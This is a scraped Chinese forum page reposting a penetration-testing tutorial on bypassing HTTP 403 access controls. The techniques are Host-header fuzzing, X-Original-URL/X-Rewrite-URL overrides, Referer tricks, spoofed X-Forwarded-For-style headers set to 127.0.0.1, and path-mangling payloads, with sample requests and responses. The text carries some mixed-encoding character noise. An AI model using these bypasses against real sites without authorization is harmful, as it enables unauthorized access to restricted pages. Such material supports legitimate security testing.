RM新时代网站-首页

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

滲透測試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀

0x01 前言




做滲透時經(jīng)常會碰到掃到的資產(chǎn)403的情況,特別是資產(chǎn)微乎其微的情況下,面試有時也會問到,這里做個總結(jié)!

0x02 利用姿勢




1.端口利用

掃描主機端口,找其它開放web服務(wù)的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請求頭中的作用:在一般情況下,幾個網(wǎng)站可能會部署在同一個服務(wù)器上,或者幾個web系統(tǒng)共享一個服務(wù)器,通過host頭來指定應(yīng)該由哪個網(wǎng)站或者web系統(tǒng)來處理用戶的請求。而很多WEB應(yīng)用通過獲取HTTP HOST頭來獲得當(dāng)前請求訪問的位置,但是很多開發(fā)人員并未意識到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認(rèn)為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進(jìn)行繞過二級域名;首先對該目標(biāo)域名進(jìn)行子域名收集,整理好子域名資產(chǎn)(host字段同樣支持IP地址)。先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個服務(wù)端返回200的狀態(tài)碼,即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URLX-Rewrite-URL標(biāo)頭繞過Web服務(wù)器的限制。通過支持X-Original-URLX-Rewrite-URL標(biāo)頭,用戶可以使用這倆請求標(biāo)頭覆蓋請求URL中的路徑,嘗試?yán)@過對更高級別的緩存和Web服務(wù)器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標(biāo)頭繞過

嘗試使用Referer標(biāo)頭繞過Web服務(wù)器的限制。

介紹:Referer請求頭包含了當(dāng)前請求頁面的來源頁面的地址,即表示當(dāng)前頁面是通過此來源頁面里的鏈接進(jìn)入的。服務(wù)端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發(fā)者會通過Nginx代理識別訪問端IP限制對接口的訪問,嘗試使用X-Forwarded-For、X-Forwared-Host等標(biāo)頭繞過Web服務(wù)器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴展名繞過

基于擴展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時候要打開探測403,因為有些網(wǎng)站的目錄沒有權(quán)限訪問會顯示403,但是在這個目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9123

    瀏覽量

    85324
  • URL
    URL
    +關(guān)注

    關(guān)注

    0

    文章

    139

    瀏覽量

    15328
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    20

    瀏覽量

    6273

原文標(biāo)題:滲透測試如何利用403頁面

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    HarmonyOS Web頁面加載的原理和優(yōu)化方法

    在移動互聯(lián)網(wǎng)時代,應(yīng)用的頁面渲染速度對于用戶體驗至關(guān)重要。相對于原生頁面,Web頁面的性能存在多方面的技術(shù)挑戰(zhàn)。本文以HarmonyOS的ArkWeb組件為基礎(chǔ),介紹了Web頁面加載中
    的頭像 發(fā)表于 12-05 15:14 ?198次閱讀
    HarmonyOS Web<b class='flag-5'>頁面</b>加載的原理和優(yōu)化方法

    什么是滲透作用_金屬封裝又是如何發(fā)生滲透

    ? 滲透作用使得芯片封裝中沒有絕對的氣密性封裝,那么什么是滲透作用?金屬封裝又是如何發(fā)生滲透的呢??? 滲透:氣體從密度大的一側(cè)向密度小的一側(cè)滲入、擴散、通過、和逸出固體阻擋層的過程。
    的頭像 發(fā)表于 11-22 10:27 ?235次閱讀

    TLV320ADC3101可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,為什么?

    如題,通過csl庫提供的程序,可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,很奇怪,數(shù)據(jù)手冊好像也沒有說讀取PAGE4與讀取其他頁面上的寄存器有什么不同,不知道有沒有誰遇到同樣問題,在線等?。。?/div>
    發(fā)表于 10-30 08:02

    TFP501、TFP403參考設(shè)計

    電子發(fā)燒友網(wǎng)站提供《TFP501、TFP403參考設(shè)計.pdf》資料免費下載
    發(fā)表于 09-29 09:53 ?0次下載
    TFP501、TFP<b class='flag-5'>403</b>參考設(shè)計

    Linux內(nèi)核中的頁面分配機制

    Linux內(nèi)核中是如何分配出頁面的,如果我們站在CPU的角度去看這個問題,CPU能分配出來的頁面是以物理頁面為單位的。也就是我們計算機中常講的分頁機制。本文就看下Linux內(nèi)核是如何管理,釋放和分配這些物理
    的頭像 發(fā)表于 08-07 15:51 ?278次閱讀
    Linux內(nèi)核中的<b class='flag-5'>頁面</b>分配機制

    TFP403數(shù)字接收器數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《TFP403數(shù)字接收器數(shù)據(jù)表.pdf》資料免費下載
    發(fā)表于 06-29 09:33 ?0次下載
    TFP<b class='flag-5'>403</b>數(shù)字接收器數(shù)據(jù)表

    全自動絕緣油耐壓測試儀的操作步驟——每日了解電力知識

    ) 2.在圖1頁面下,按 設(shè)置 鍵進(jìn)入下一級頁面(圖2); 3.在圖2頁面下,按 選擇 鍵移動光標(biāo)√ 至 GB1986處,按 確認(rèn) 鍵即可進(jìn)入國標(biāo)1986設(shè)置子頁面(圖3)。 在圖3
    的頭像 發(fā)表于 06-17 10:23 ?551次閱讀
    全自動絕緣油耐壓<b class='flag-5'>測試</b>儀的操作步驟——每日了解電力知識

    鴻蒙開發(fā):【頁面棧及任務(wù)鏈】

    單個UIAbility組件可以實現(xiàn)多個頁面,并在多個頁面之間跳轉(zhuǎn),這種UIAbility組件內(nèi)部的頁面跳轉(zhuǎn)關(guān)系稱為“頁面?!?,由ArkUI框架統(tǒng)一管理,如下圖中的UIAbility1
    的頭像 發(fā)表于 06-14 10:10 ?407次閱讀
    鴻蒙開發(fā):【<b class='flag-5'>頁面</b>棧及任務(wù)鏈】

    鴻蒙OS開發(fā):典型頁面場景【一次開發(fā),多端部署】實戰(zhàn)(音樂專輯

    本小節(jié)將以音樂專輯為例,介紹如何使用自適應(yīng)布局能力和響應(yīng)式布局能力適配不同尺寸窗口。
    的頭像 發(fā)表于 05-24 20:33 ?621次閱讀
    鴻蒙OS開發(fā):典型<b class='flag-5'>頁面</b>場景【一次開發(fā),多端部署】實戰(zhàn)(音樂專輯<b class='flag-5'>頁</b>)

    STM32F103利用I2C讀寫EEPROM時,利用寫入時,讀回的數(shù)據(jù)和寫入的數(shù)據(jù)不一致,為什么?

    在STM32F103芯片中,利用I2C讀寫EEPROM時,單字節(jié)寫入,讀回的數(shù)據(jù)和寫入的一致;但是當(dāng)利用寫入時,讀回的數(shù)據(jù)和寫入的數(shù)據(jù)不一致,這是什么原因?qū)е碌模?/div>
    發(fā)表于 03-20 07:01

    touchgfx4.20.0頁面層數(shù)比較多容易出現(xiàn)卡死現(xiàn)象怎么解決?

    頁面層數(shù)比較多,添加了表格等控件,當(dāng)點擊最上層頁面的時候,很容易出現(xiàn)卡死現(xiàn)象,通過stm32ide調(diào)試,找不到死機的地方,既不是進(jìn)入死循環(huán),也沒進(jìn)入硬件fault中斷,像是ui任務(wù)死機了;請問這個怎么查找解決?
    發(fā)表于 03-08 08:01

    LABVIEW WEB發(fā)布,H5頁面,可讀寫VI數(shù)據(jù)

    賬號: a12345 密碼: 12345678 普通用戶 賬號: b12345 密碼: 12345678 只有普通用戶可以登錄手機頁面!
    發(fā)表于 02-25 00:29

    鴻蒙頁面示例

    @Component 標(biāo)簽修飾UI,相當(dāng)于Android的view,所有的UI組件都要使用@Component標(biāo)簽 @Entry標(biāo)簽 表明當(dāng)前是一個頁面,不是一個視圖。多個組件組合時只能有一個
    的頭像 發(fā)表于 02-01 11:24 ?455次閱讀

    AT32F403A系列 數(shù)據(jù)手冊

    電子發(fā)燒友網(wǎng)站提供《AT32F403A系列 數(shù)據(jù)手冊.pdf》資料免費下載
    發(fā)表于 01-22 10:06 ?6次下載

    介紹一款基于java的滲透測試神器-CobaltStrike

    Cobalt Strike是一款基于java的滲透測試神器,常被業(yè)界人稱為CS神器。
    的頭像 發(fā)表于 01-16 09:16 ?963次閱讀
    介紹一款基于java的<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>神器-CobaltStrike
    RM新时代网站-首页